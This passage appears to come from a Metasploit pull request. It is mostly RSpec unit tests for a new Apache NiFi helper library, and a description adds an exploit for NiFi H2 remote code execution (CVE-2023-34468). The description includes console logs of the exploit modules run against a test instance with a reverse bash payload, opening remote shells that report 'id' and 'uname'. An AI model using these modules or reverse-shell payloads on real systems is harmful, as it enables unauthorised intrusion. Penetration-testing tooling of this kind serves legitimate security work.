+      expect(subject.retrieve_login_token).to eq(('eyJraWQiOiIzNzhiOWUwYS0wOGJlLTRiNW-tYThhNi0yOWZhM2Y3Yz_4NmMiLCJhbGciOiJQUzUxMiJ9.eyJzdWIi' * 12) +
+      'OiJlN2U2OGRhMy1jZmQ1LTQ0YTYtOTdlOS1iYWFlYzg1ZDM2MTQiLCJhdWQiOi')
+    end
+  end
+end

--- a/spec/lib/msf/core/exploit/http/nifi/dbconnectionpool_spec.rb
+++ b/spec/lib/msf/core/exploit/http/nifi/dbconnectionpool_spec.rb
@@ -1,0 +1,125 @@
+# -*- coding:binary -*-
+
+require 'spec_helper'
+
+RSpec.describe Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool do
+  subject do
+    mod = ::Msf::Module.new
+    mod.extend described_class
+    mod
+  end
+
+  let(:valid_code) do
+    200
+  end
+
+  describe '#nifi Dbconnectionpool stop_dbconnectionpool' do
+    it 'raises error if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
+
+      expect { subject.stop_dbconnectionpool('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool::DBConnectionPoolError)
+    end
+
+    it 'raises error when unexpected response code is received' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 400
+        res.body = ''
+        res
+      end
+
+      expect { subject.stop_dbconnectionpool('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool::DBConnectionPoolError)
+    end
+
+    it 'returns nil when successfull' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = valid_code
+        res.body = ''
+        res
+      end
+
+      expect(subject.stop_dbconnectionpool('a', 'a')).to be_nil
+    end
+  end
+
+  describe '#nifi Dbconnectionpool delete_dbconnectionpool' do
+    it 'raises error if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
+
+      expect { subject.delete_dbconnectionpool('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool::DBConnectionPoolError)
+    end
+
+    it 'raises error when unexpected response code is received' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 302
+        res.body = ''
+        res
+      end
+
+      expect { subject.delete_dbconnectionpool('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool::DBConnectionPoolError)
+    end
+
+    it 'raises error after 20 version deletes' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 400
+        res.body = 'is not the most up-to-date revision'
+        res
+      end
+
+      expect { subject.delete_dbconnectionpool('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool::DBConnectionPoolError)
+    end
+
+    it 'returns nil when successfull' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = valid_code
+        res.body = ''
+        res
+      end
+
+      expect(subject.delete_dbconnectionpool('a', 'a')).to be_nil
+    end
+  end
+
+  describe '#nifi Dbconnectionpool start_dbconpool' do
+    it 'raises error if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
+
+      expect { subject.start_dbconnectionpool('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool::DBConnectionPoolError)
+    end
+
+    it 'raises error when unexpected response code is received' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 400
+        res.body = ''
+        res
+      end
+
+      expect { subject.start_dbconnectionpool('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool::DBConnectionPoolError)
+    end
+
+    it 'returns nil when successfull' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = valid_code
+        res.body = ''
+        res
+      end
+
+      expect(subject.start_dbconnectionpool('a', 'a')).to be_nil
+    end
+  end
+end

--- a/spec/lib/msf/core/exploit/http/nifi/processor_spec.rb
+++ b/spec/lib/msf/core/exploit/http/nifi/processor_spec.rb
@@ -1,0 +1,147 @@
+# -*- coding:binary -*-
+
+require 'spec_helper'
+
+RSpec.describe Msf::Exploit::Remote::HTTP::Nifi::Processor do
+  subject do
+    mod = ::Msf::Module.new
+    mod.extend described_class
+    mod
+  end
+
+  let(:valid_code) do
+    200
+  end
+
+  describe '#nifi Processor start_processor' do
+    it 'raises error if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
+
+      expect { subject.start_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    end
+
+    it 'raises error when unexpected response code is received' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 400
+        res.body = ''
+        res
+      end
+
+      expect { subject.start_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    end
+
+    it 'returns nil when successfull' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = valid_code
+        res.body = ''
+        res
+      end
+
+      expect(subject.start_processor('a', 'a')).to be_nil
+    end
+  end
+
+  describe '#nifi Processor stop_processor' do
+    it 'raises error if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
+
+      expect { subject.stop_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    end
+
+    it 'raises error when unexpected response code is received' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 400
+        res.body = ''
+        res
+      end
+
+      expect { subject.stop_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    end
+
+    it 'returns nil when successfull' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = valid_code
+        res.body = ''
+        res
+      end
+
+      expect(subject.stop_processor('a', 'a')).to be_nil
+    end
+  end
+
+  describe '#nifi Processor create_processor' do
+    it 'raises error if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
+
+      expect { subject.create_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    end
+
+    it 'raises error when unexpected response code is received' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 400
+        res.body = ''
+        res
+      end
+
+      expect { subject.create_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    end
+
+    it 'returns UUID when successfull' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 201
+        res.body = '{"id":"628de124-3d0f-11ee-be56-0242ac120002"}'
+        res
+      end
+
+      expect(subject.create_processor('a', 'a')).to eq('628de124-3d0f-11ee-be56-0242ac120002')
+    end
+  end
+
+  describe '#nifi Processor get_processor_field' do
+    it 'raises error if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
+
+      expect { subject.get_processor_field('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    end
+
+    it 'raises error when unexpected response code is received' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 400
+        res.body = ''
+        res
+      end
+
+      expect { subject.get_processor_field('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    end
+
+    it 'returns UUID when successfull' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 200
+        res.body = '{"id":"628de124-3d0f-11ee-be56-0242ac120002"}'
+        res
+      end
+
+      expect(subject.get_processor_field('a', 'a')).to eq('628de124-3d0f-11ee-be56-0242ac120002')
+    end
+  end
+end

--- a/spec/lib/msf/core/exploit/http/nifi_spec.rb
+++ b/spec/lib/msf/core/exploit/http/nifi_spec.rb
@@ -1,0 +1,81 @@
+# -*- coding:binary -*-
+
+require 'spec_helper'
+
+RSpec.describe Msf::Exploit::Remote::HTTP::Nifi do
+  subject do
+    mod = ::Msf::Module.new
+    mod.extend described_class
+    mod
+  end
+
+  let(:valid_code) do
+    200
+  end
+
+  describe '#nifi get_version' do
+    it 'returns nil if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
+
+      expect(subject.get_version).to be_nil
+    end
+
+    it 'returns nil if version cant be found' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 200
+        res.body = 'foobar'
+        res
+      end
+
+      expect(subject.get_version).to be_nil
+    end
+
+    it 'returns version when successfull' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = valid_code
+        res.body = '<script type="text/javascript" src="js/nf/nf-namespace.js?1.21.0"></script>'
+        res
+      end
+
+      expect(subject.get_version).to eq(Rex::Version.new('1.21.0'))
+    end
+  end
+
+  describe '#nifi fetch_root_process_group' do
+    it 'returns nil if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
+
+      expect(subject.fetch_root_process_group('a')).to be_nil
+    end
+
+    it 'returns nil if value not found' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 200
+        res.body = 'foobar'
+        res
+      end
+
+      expect(subject.fetch_root_process_group('a')).to be_nil
+    end
+
+    it 'returns UUID when successfull' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = valid_code
+        res.body = '{"id":"628de124-3d0f-11ee-be56-0242ac120002"}'
+        res
+      end
+
+      expect(subject.fetch_root_process_group('a')).to eq('628de124-3d0f-11ee-be56-0242ac120002')
+    end
+  end
+end


### PR DESCRIPTION
This PR does a whole bunch of apache nifi things.
1) Add a new nifi library which has a bunch of common functions used by modules
2) cleanup the apache nifi processor rce to use the library
3) add a new exploit for apache nifi h2 rce (CVE-2023-34468, I believe this is the first public PoC)

## Verification
- [ ] start a nifi 1.20.0 docker
- [ ] Test `auxiliary/scanner/http/apache_nifi_version`  properly identifies it
- [ ] Test `multi/http/apache_nifi_processor_rce` still gets you a shell
- [ ] Test `exploit/linux/http/apache_nifi_h2_rce` gets you a shell

An example of all this running can be seen here:

```
msf6 > use auxiliary/scanner/http/apache_nifi_version
msf6 auxiliary(scanner/http/apache_nifi_version) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 auxiliary(scanner/http/apache_nifi_version) > run

[+] Apache NiFi 1.20.0 found on 127.0.0.1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/apache_nifi_version) > use multi/http/apache_nifi_processor_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/apache_nifi_processor_rce) > setg rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(multi/http/apache_nifi_processor_rce) > setg lhost 1.1.1.1
lhost => 1.1.1.1
msf6 exploit(multi/http/apache_nifi_processor_rce) > setg username 4b6caac4-e1c6-431d-8e63-f014a6541362
username => 4b6caac4-e1c6-431d-8e63-f014a6541362
msf6 exploit(multi/http/apache_nifi_processor_rce) > setg password E3ke7kCROjBabztg0acFemg5xk2QiQs1
password => E3ke7kCROjBabztg0acFemg5xk2QiQs1
msf6 exploit(multi/http/apache_nifi_processor_rce) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Apache NiFi instance supports logins
[*] Command shell session 1 opened (1.1.1.1:4444 -> 172.17.0.2:44498) at 2023-08-04 21:34:22 -0400
[*] Waiting 5 seconds before stopping and deleting

id
uid=1000(nifi) gid=1000(nifi) groups=1000(nifi)
uname -a
Linux 06967477694d 6.3.0-kali1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29) x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 127.0.0.1 - Command shell session 1 closed.
msf6 exploit(multi/http/apache_nifi_processor_rce) > use exploit/linux/http/apache_nifi_h2_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/apache_nifi_h2_rce) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Apache NiFi instance supports logins and vulnerable version detected: 1.20.0
[*] Command shell session 2 opened (1.1.1.1:4444 -> 172.17.0.2:49454) at 2023-08-04 21:35:19 -0400
[*] Waiting 15 seconds before stopping and deleting
[*] Command shell session 3 opened (1.1.1.1:4444 -> 172.17.0.2:49470) at 2023-08-04 21:35:20 -0400
[*] Command shell session 6 opened (1.1.1.1:4444 -> 172.17.0.2:49496) at 2023-08-04 21:35:23 -0400
[*] Command shell session 4 opened (1.1.1.1:4444 -> 172.17.0.2:49486) at 2023-08-04 21:35:25 -0400
[*] Command shell session 7 opened (1.1.1.1:4444 -> 172.17.0.2:49512) at 2023-08-04 21:35:26 -0400
[*] Command shell session 8 opened (1.1.1.1:4444 -> 172.17.0.2:49524) at 2023-08-04 21:35:26 -0400

id
uid=1000(nifi) gid=1000(nifi) groups=1000(nifi)
uname -a
Linux 06967477694d 6.3.0-kali1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29) x86_64 x86_64 x86_64 GNU/Linux
```
